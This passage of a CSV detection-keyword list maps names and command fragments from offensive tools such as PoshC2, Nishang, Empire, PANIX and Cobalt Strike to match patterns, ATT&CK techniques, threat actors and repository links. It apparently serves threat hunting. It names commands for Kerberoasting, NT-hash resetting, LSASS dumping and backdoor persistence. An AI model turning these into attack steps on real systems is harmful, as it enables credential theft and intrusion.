"*set-pushover-applicationtoken*",".{0,1000}set\-pushover\-applicationtoken.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58660"
"*set-pushover-userkeys*",".{0,1000}set\-pushover\-userkeys.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58661"
"*Set-RemotePSRemoting*",".{0,1000}Set\-RemotePSRemoting.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58662"
"*Set-RemotePSRemoting.ps1*",".{0,1000}Set\-RemotePSRemoting\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58663"
"*Set-RemoteShellAccess.ps1*",".{0,1000}Set\-RemoteShellAccess\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58664"
"*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58665"
"*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58666"
"*SeTrustedCredManAccessPrivilegePoC.exe*",".{0,1000}SeTrustedCredManAccessPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58667"
"*Set-SamAccountPasswordHash * -NTHash *",".{0,1000}Set\-SamAccountPasswordHash\s.{0,1000}\s\-NTHash\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","58668"
"*Set-ServiceBinPath*",".{0,1000}Set\-ServiceBinPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58670"
"*set-shellcode-process default*",".{0,1000}set\-shellcode\-process\sdefault.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58671"
"*setspn -A HTTP/*",".{0,1000}setspn\s\-A\sHTTP\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58672"
"*setspn -T medin -Q */*",".{0,1000}setspn\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58673"
"*setspn.exe -T medin -Q */*",".{0,1000}setspn\.exe\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58675"
"*SetStatusCheckIn updates the last time the Agent successfully communicated with the Merlin server*",".{0,1000}SetStatusCheckIn\supdates\sthe\slast\stime\sthe\sAgent\ssuccessfully\scommunicated\swith\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58677"
"*setthreadcontext.x64*",".{0,1000}setthreadcontext\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","58678"
"*setthreadcontext.x86*",".{0,1000}setthreadcontext\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","58679"
"*Setting up GFlags & SilentProcessExit settings in registry?*",".{0,1000}Setting\sup\sGFlags\s\&\sSilentProcessExit\ssettings\sin\sregistry\?.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","58680"
"*setuid_setgid.py*",".{0,1000}setuid_setgid\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","58682"
"*setup_apfell.sh*",".{0,1000}setup_apfell\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","58684"
"*setup_backdoor_user*",".{0,1000}setup_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58685"
"*setup_cap_backdoor*",".{0,1000}setup_cap_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58686"
"*setup_generator_persistence*",".{0,1000}setup_generator_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58687"
"*setup_git_persistence*",".{0,1000}setup_git_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58688"
"*setup_initd_backdoor*",".{0,1000}setup_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58689"
"*setup_malicious_docker_container*",".{0,1000}setup_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58690"
"*setup_malicious_package*",".{0,1000}setup_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58691"
"*setup_motd_backdoor*",".{0,1000}setup_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58692"
"*setup_obfuscate_xor_key*",".{0,1000}setup_obfuscate_xor_key.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","58693"
"*setup_rc_local_backdoor*",".{0,1000}setup_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58694"
"*setup_reflective_loader*",".{0,1000}setup_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58695"
"*setup_sudoers_backdoor*",".{0,1000}setup_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58696"
"*setup_suid_backdoor*",".{0,1000}setup_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58697"
"*setup_system_binary_backdoor*",".{0,1000}setup_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58698"
"*Set-WMIBackdoor -URL *",".{0,1000}Set\-WMIBackdoor\s\-URL\s.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","58699"
"*Set-WorkingHours*",".{0,1000}Set\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58700"
"*sevagas/macro_pack*",".{0,1000}sevagas\/macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","58701"
"*seventeenman/CallBackDump*",".{0,1000}seventeenman\/CallBackDump.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 